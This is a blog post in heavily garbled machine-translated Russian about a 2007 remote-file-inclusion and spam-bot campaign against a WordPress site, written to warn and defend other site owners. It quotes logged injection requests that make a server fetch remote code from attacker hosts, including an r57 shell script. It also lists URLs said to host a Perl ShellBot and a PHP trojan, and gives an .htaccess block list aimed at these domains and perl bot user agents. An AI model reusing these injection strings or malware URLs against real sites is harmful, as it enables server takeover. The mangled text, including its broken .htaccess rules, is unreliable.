Для этого последние три дня данного блога, страдающих DOS атаки. Нападение до сих пор живы в настоящее время я не думаю, что они оставят еще. Я могу запретил это бот прямо как они были направления формирования пакета (пакетов спуфинг), как google-бот http://www.whois-search.com/whois/64.233.166.136. Им все еще ищем право ISP.
OrgName: Google Inc OrgID: GOGL Адрес: 1600 Amphitheatre Parkway Город: Mountain View StateProv: CA индекс: 94043 Страна: СШАНа данный момент я блокировали все удаленных потоков от их случайного пребывания *. ком и "perl бот подписи", но блокировка не остановит их от hammering этом сайте. Я буду отправлять 503 (Служба недоступна) по просьбе некоторых поэтому, если у вас возникли проблемы с доступом этом сайте, пожалуйста, проверьте позже.
Вид инъекции
Существует много uri параметр в моем журналов (я-инвалидов сервера - лимит средств), они, вероятно, имеет большой инвентаризации-проверить списки известных уязвимостей CMS. Я могу лишь подтвердить, что его blackhat seo спам бот, как они запроса включают типичные order.php странице.
/ эс / wordpress / хау для удален-wordpress-нетто-на спам-раствор для инъекций-инфицированных-по-mike-я gger-goro-class-mailphp/order.php /? wp = http://hom3.t35 .com / xpl / взломать / id.txt? / эс / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Для просмотра следующих источников нужно исключить пребывания на сайте с вашей антивирусной программы.
- Perl / ShellBot.B троянских - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz
htaccess заблокирован плохой кодекс Форсунка и Perl Бот (Botnet)
Если вы имеет аналогичные проблемы. Вы должны блокировать следующие домена в вашей htaccess.
mod_setenvifSetEnvIfNoCase ссылка "^ http:// (www.)? T35 \. Ком" codeinjector_ref = 1 SetEnvIfNoCase ссылка "^ http:// (www.)? Jorgevolio \. Ком" codeinjector_ref = 1 SetEnvIfNoCase ссылка "^ http:// (www.)? emabe \. ком "codeinjector_ref = 1 SetEnvIfNoCase ссылка" ^ http:// (www.)? pawang \. в "codeinjector_ref = 1 SetEnvIfNoCase ссылка" ^ http:// (www.)? gw-золото \. чистых "codeinjector_ref = 1 SetEnvIfNoCase User-Agent" ^ libwww-perl * "shell_bots = 1 SetEnvIfNoCase User-Agent" ^ Amidalla * "shell_bots = 1 <FilesMatch "(.*)"> Заказ Позвольте, позвольте Отказывать от всех Отказывать с окр = codeinjector_ref Отказывать от окр = shell_bots </ FilesMatch>если у arent уверены, что если вы сервер поддержки mod_setenvif заверните ее как пример ниже.
<IfModule Mod_setenvif.c> # ... заменить эту строку с кодом выше ... </ IfModule>
Как ловушку Perl Shell Bot
Нам нужен шаблон для этой ловушки ботами. конечно, мы знали, что эти роботы:
- не делает чести robot.txt
- они сканируют все подкаталог
- они имеет шаблон URI запроса
А сейчас я лишь создать подкаталог для автоматического запрета (и некоторые другие вещи), основанные на их характер. Алекса бот будет запрещена, поскольку они слишком dont честь robot.txt.
Я буду обновлении этой должности время от времени. Как проверить, связанных статей о том, как пакет спуфинга и проверки формирования / обман пакет.
Последние сканирование и обновление
Ниже список будет автоматически добавлен.
- 24 декабря 2007 года
- ip: 64.26.63.10 парам: вход =,? вдохнуть: http://pawang.in/r57.txt
- 24 декабря 2007 года
- ip: 64.26.63.10 парам: реж =, логин = вдохнуть: http://pawang.in/r57.txt??
- 25 декабря 2007 года
- ip: 59.158.128.138 парам: р =,: = вдохнуть allinurl: http://gw-gold.net/jpg/pictures/test.txt
Внешние ресурсы
- 21 декабря 2007 года в 10:48 вечера
- 16 февраля 2008 года в 3:05 утра
- 0,3
- url
Нет ответов на "массового дистанционного кодекса Injection, как робот Google - Пакетные Spoofing Perl бот и Trojan"
Trackback URL: Используйте TrackBack url ↑ пинговать эту статью. Если Ваш блог не поддерживает Trackbacks Вы можете оставить комментарий, вместо.
"писать, как если бы вы разговаривали с хорошим другом (в передней части вашей матери)."
. Ваш сказать
Disclaimer: Для любого содержания, которое вы разместите, Вы тем самым предоставляете Kakkoi безгонорарные, окончательное, вечное, эксклюзивные и сублицензируемое на использование, воспроизведение, модификацию, адаптацию, публикацию, перевод, создавать производные работы, распространять, исполнять или показывать такие материалы, полностью или частично, во всем мире и включение его в другие произведения в любой форме, в средствах массовой информации или технологии, известной сейчас или позже разработаны. Некоторые права защищены.









После "Кодекс" предназначены для защиты вас и других пользователей этого сайта.
Для того чтобы сохранить этот опыт приятной и интересной для всех наших пользователей, мы просим Вас следовать выше Инструкция.
быть первым комментировать.